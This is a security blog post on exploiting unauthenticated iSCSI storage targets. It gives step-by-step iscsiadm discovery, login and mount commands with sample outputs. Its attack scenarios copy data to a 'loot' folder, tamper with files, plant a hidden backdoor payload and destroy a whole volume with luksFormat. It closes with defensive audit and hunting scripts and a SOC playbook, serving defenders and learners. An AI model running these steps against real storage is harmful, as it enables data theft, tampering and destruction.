Introduction
Storage systems are prime targets in modern infrastructure. One common technology used for block storage over IP networks is iSCSI (Internet Small Computer Systems Interface). When misconfigured, iSCSI targets can expose sensitive storage volumes without requiring authentication. This blog post walks through the basics of iSCSI, demonstrates how unauthenticated access can be exploited using the iscsiadm tool, explores detailed attack scenarios with step-by-step execution, and closes with mitigations. Flowcharts, diagrams, and example outputs are included for clarity.
⚠️ Warning: This content is for educational and defensive security purposes only. The actual exploitation proof-of-concept (POC) scripts and live attack payloads are intentionally not included. Attempting these techniques without authorization is illegal and unethical.
Understanding iSCSI
What is iSCSI?
iSCSI allows SCSI commands to be transmitted over TCP/IP (default port 3260). It enables clients (initiators) to connect to remote block devices (targets) as if they were physically attached. It is commonly deployed in SANs (Storage Area Networks) and NAS appliances.
iSCSI Architecture Diagram
+------------------+        TCP/IP Network        +-------------------+
|    Initiator     | <--------------------------> |      Target       |
|  (Client Host)   |                              | (Storage Server)  |
|  - iscsiadm      |                              |  - Exposed LUNs   |
+------------------+                              +-------------------+
- Initiator: The client host using iscsiadm.
- Target: The storage system exposing block devices (LUNs).
- IQN: iSCSI Qualified Name, unique identifier for a target.
Security Features
- CHAP authentication (unidirectional or mutual).
- Initiator restrictions (by IQN or IP ACL).
If these are disabled, any host can connect to the target.
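One way to check the CHAP side of this from an initiator host is to read its open-iscsi node records, as printed by iscsiadm -m node -o show, and flag targets configured without authentication. This is an added example, not code from the original post; the sample records, IQNs and addresses are constructed placeholders.

```python
# Constructed sample in the layout printed by `iscsiadm -m node -o show`;
# IQNs, addresses and user names are placeholders, not values from the post.
SAMPLE_RECORDS = """\
# BEGIN RECORD 2.1.9
node.name = iqn.2024-01.example.storage:open-lun
node.session.auth.authmethod = None
node.conn[0].address = 192.0.2.10
# END RECORD
# BEGIN RECORD 2.1.9
node.name = iqn.2024-01.example.storage:chap-lun
node.session.auth.authmethod = CHAP
node.session.auth.username_in = <empty>
node.conn[0].address = 192.0.2.11
# END RECORD
# BEGIN RECORD 2.1.9
node.name = iqn.2024-01.example.storage:mutual-lun
node.session.auth.authmethod = CHAP
node.session.auth.username_in = target-user
node.conn[0].address = 192.0.2.12
# END RECORD
"""

def parse_records(text):
    """Split the dump into one dict of key/value settings per node record."""
    records, current = [], None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("# BEGIN RECORD"):
            current = {}
        elif line.startswith("# END RECORD") and current is not None:
            records.append(current)
            current = None
        elif current is not None and " = " in line:
            key, value = line.split(" = ", 1)
            current[key] = "" if value == "<empty>" else value
    return records

def auth_level(record):
    """Classify a record as 'none', 'chap' (one-way) or 'mutual-chap'."""
    if record.get("node.session.auth.authmethod", "None").upper() != "CHAP":
        return "none"
    return "mutual-chap" if record.get("node.session.auth.username_in") else "chap"

def audit(text):
    """Return (target IQN, portal address, auth level) for every record."""
    return [(r.get("node.name"), r.get("node.conn[0].address"), auth_level(r))
            for r in parse_records(text)]

if __name__ == "__main__":
    print("\n".join(f"{lvl:11} {addr} {iqn}" for iqn, addr, lvl in audit(SAMPLE_RECORDS)))
```

A record with authmethod None whose login still succeeds means the target accepts unauthenticated sessions and should be reported for remediation.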
Proof of Concept: Exploiting Unauthenticated iSCSI Targets
Tools and Commands Used
- iscsiadm: Native Linux tool for discovery, login, and session management.
- systemctl: To ensure the iscsid daemon is running.
- dmesg/lsblk: To confirm attached block devices.
Attack Path Flowchart
Attacker (Initiator)
↓
Discovery (iscsiadm -m discovery)
↓
Unauthenticated Login (iscsiadm --login)
↓
Block Devices Attached (/dev/sdX)
↓
Impact: Read/Write Access to Storage
Step-by-Step Exploitation with Example Outputs
1. Start the iSCSI daemon:
sudo systemctl start iscsid
Expected output:
[ OK ] Started Login and scanning of iSCSI devices.
2. Discovery:
sudo iscsiadm -m discovery -t sendtargets -p 10.xxx.xxx.xxx:3260
Expected output:
10.xxx.xxx.xxx:3260,1 pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX
3. Login without authentication:
sudo iscsiadm -m node -T pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX -p 10.xxx.xxx.xxx:3260 --login
Expected output:
Logging in to [iface: default, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX, portal: 10.xxx.xxx.xxx,3260]
Login to [pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX] successful.
4. Confirm the attached block device:
lsblk
Expected output:
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0   80G  0 disk
└─sda1   8:1    0   80G  0 part /
sdb      8:16   0  250G  0 disk
dmesg | grep sd
Expected output:
[ 123.456789] sd 2:0:1:0: [sdb] Attached SCSI disk
5. Cleanup:
sudo iscsiadm -m node --logoutall=all
sudo systemctl stop iscsid
Expected output:
Logging out of session [sid: 1, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX]
Logout of [sid: 1, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX] successful.
Advanced Attack Scenarios: Detailed Steps with Outputs
Scenario A: Data Exfiltration
1. Discover and log in as shown above.
2. Identify the new block device (/dev/sdb).
3. Mount it read-only:
sudo mkdir /mnt/iscsi
sudo mount -o ro /dev/sdb1 /mnt/iscsi
Expected output:
mount: /mnt/iscsi: mounted read-only.
4. Copy sensitive data out:
cp /mnt/iscsi/confidential.db ~/loot/
Scenario B: Data Manipulation/Destruction
1. Mount writable:
sudo mount /dev/sdb1 /mnt/iscsi
2. Modify files:
echo "tampered" > /mnt/iscsi/config.ini
Scenario C: Persistence Mechanism
1. Connect to target.
2. Create hidden directory:
mkdir /mnt/iscsi/.backdoor
cp payload.bin /mnt/iscsi/.backdoor/
Scenario D: Lateral Movement / Pivoting
1. Identify application configs:
ls /mnt/iscsi/app/
2. Inject malicious script.
Scenario E: Ransomware Operations
- Encrypt block devices:
sudo cryptsetup luksFormat /dev/sdb
- Expected result: Entire block device encrypted
Attack Scenarios Diagram
           Discovery → Unauthenticated Login → Device Attachment
                                     ↓
     ┌───────────────┬───────────────┬───────────────┬───────────────┐
     ↓               ↓               ↓               ↓               ↓
Data Exfil      Data Modify     Persistence    Lateral Move     Ransomware
Full Attack Chain Simulation Transcript
This transcript shows a continuous example from discovery to mounting sensitive data.
# Start iSCSI daemon
sudo systemctl start iscsid
# Discover exposed iSCSI targets
sudo iscsiadm -m discovery -t sendtargets -p 10.xxx.xxx.xxx:3260
10.xxx.xxx.xxx:3260,1 pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX
# Log in without credentials
sudo iscsiadm -m node -T pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX -p 10.xxx.xxx.xxx:3260 --login
Logging in to [iface: default, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX, portal: 10.xxx.xxx.xxx,3260]
Login to [pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX] successful.
# Verify block device
lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 80G 0 disk
└─sda1 8:1 0 80G 0 part /
sdb 8:16 0 250G 0 disk
# Mount the new LUN
sudo mkdir /mnt/iscsi
sudo mount /dev/sdb1 /mnt/iscsi
# Access sensitive files
ls /mnt/iscsi
finance.db hr_records/ secrets/
# Copy confidential data
cp /mnt/iscsi/finance.db ~/loot/
# Cleanup
sudo iscsiadm -m node --logoutall=all
Logout of [sid: 1, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX] successful.
sudo systemctl stop iscsid
Defensive Playbook for SOC and Threat Hunters
From a SOC or threat-hunting perspective, defense against unauthenticated iSCSI exposure should focus on visibility, detection, and preventive controls. The following measures go beyond configuration and provide actionable steps for defenders:
- Authentication Enforcement: Continuously validate that CHAP or mutual CHAP is enabled on all discovered iSCSI targets. Monitor configuration drift in storage appliances.
- Initiator Restrictions: Maintain an allowlist of approved initiator IQNs and IPs. Alerts should trigger when unrecognized initiators attempt discovery or login.
- Network Segmentation & Monitoring:
  - Place storage networks in isolated VLANs.
  - Deploy IDS/IPS signatures for iSCSI traffic anomalies (e.g., unexpected discovery requests from non-storage segments).
  - Alert on iSCSI traffic crossing unauthorized zones.
- Firewall and NAC Rules: Ensure only storage management hosts can reach TCP/3260. NAC policies should prevent rogue initiators.
- Log Monitoring:
  - Collect and parse storage system logs for discovery, login, and session events.
  - Correlate with endpoint logs to identify suspicious access attempts.
- Threat Hunting Queries:
  - Search for unusual use of iscsiadm across Linux endpoints.
  - Hunt for mounts of new block devices outside standard provisioning workflows.
- Incident Response Preparation:
  - Playbooks for rapid logout of unauthorized sessions (iscsiadm -m node --logoutall=all).
  - Predefined containment steps such as blocking initiator IPs at the firewall.
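A hunting sketch for the allowlist and iscsiadm items above: it scans endpoint process-execution records for iscsiadm discovery or login runs and alerts when the host or the portal is not approved. This is an added example, not from the original post; the log layout, host names, portals and IQNs are constructed placeholders.

```python
import shlex
# Assumptions (placeholders): approved initiator hosts and storage portals.
APPROVED_HOSTS = {"backup01"}
APPROVED_PORTALS = {"192.0.2.10:3260"}
# Constructed process-execution records: timestamp, host, user, command line (tab-separated).
SAMPLE_LOG = """\
2024-05-01T02:00:01Z\tbackup01\troot\tiscsiadm -m node -T iqn.2024-01.example:bk -p 192.0.2.10:3260 --login
2024-05-01T09:14:22Z\tws-117\tjdoe\tsudo iscsiadm -m discovery -t sendtargets -p 192.0.2.10:3260
2024-05-01T09:15:03Z\tws-117\tjdoe\tsudo iscsiadm --mode node --targetname iqn.2024-01.example:bk --portal=192.0.2.10 -l
2024-05-01T09:20:40Z\tbackup01\troot\tiscsiadm -m discovery -t sendtargets -p 198.51.100.7
"""
OPTS = {"-m": "mode", "--mode": "mode", "-t": "type", "--type": "type",
        "-p": "portal", "--portal": "portal", "-T": "target", "--targetname": "target"}

def parse_iscsiadm(cmdline):
    """Return the options of an iscsiadm invocation, or None for other commands."""
    argv = shlex.split(cmdline)
    names = [a.rsplit("/", 1)[-1] for a in argv]  # tolerate /usr/sbin/iscsiadm, sudo ...
    if "iscsiadm" not in names:
        return None
    it = iter(argv[names.index("iscsiadm") + 1:])
    found = {"login": False}
    for arg in it:
        name, _, value = arg.partition("=") if arg.startswith("--") else (arg, "", "")
        if name in ("-l", "--login"):
            found["login"] = True
        elif name in OPTS:  # short and long spellings, "--opt value" and "--opt=value"
            found[OPTS[name]] = value or next(it, "")
    return found

def hunt(log_text):
    """Return (ts, host, user, portal, reasons) for unapproved discovery/login runs."""
    alerts = []
    for line in log_text.splitlines():
        ts, host, user, cmdline = line.split("\t", 3)
        opts = parse_iscsiadm(cmdline)
        if not opts or not (opts["login"] or opts.get("mode") == "discovery"):
            continue
        portal = opts.get("portal", "")
        portal += ":3260" if portal and ":" not in portal else ""  # default iSCSI port
        reasons = [text for bad, text in (
            (host not in APPROVED_HOSTS, "unapproved initiator host"),
            (portal not in APPROVED_PORTALS, "unapproved portal")) if bad]
        if reasons:
            alerts.append((ts, host, user, portal, reasons))
    return alerts

if __name__ == "__main__":
    print("\n".join(map(str, hunt(SAMPLE_LOG))))
```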
Defensive Architecture Flow
[Initiator Attempt] → [Auth & IQN/IP Validation] → [Permitted Target Access]
[Unapproved Initiator] → [SOC Alert] → [Block/Investigate]
Conclusion
Unauthenticated iSCSI targets expose organizations to severe risks: data theft, destruction, ransomware, and lateral movement. The attack path is simple, requiring only iscsiadm and basic Linux commands. Organizations must enforce authentication, network segmentation, and strict initiator restrictions to protect storage infrastructure.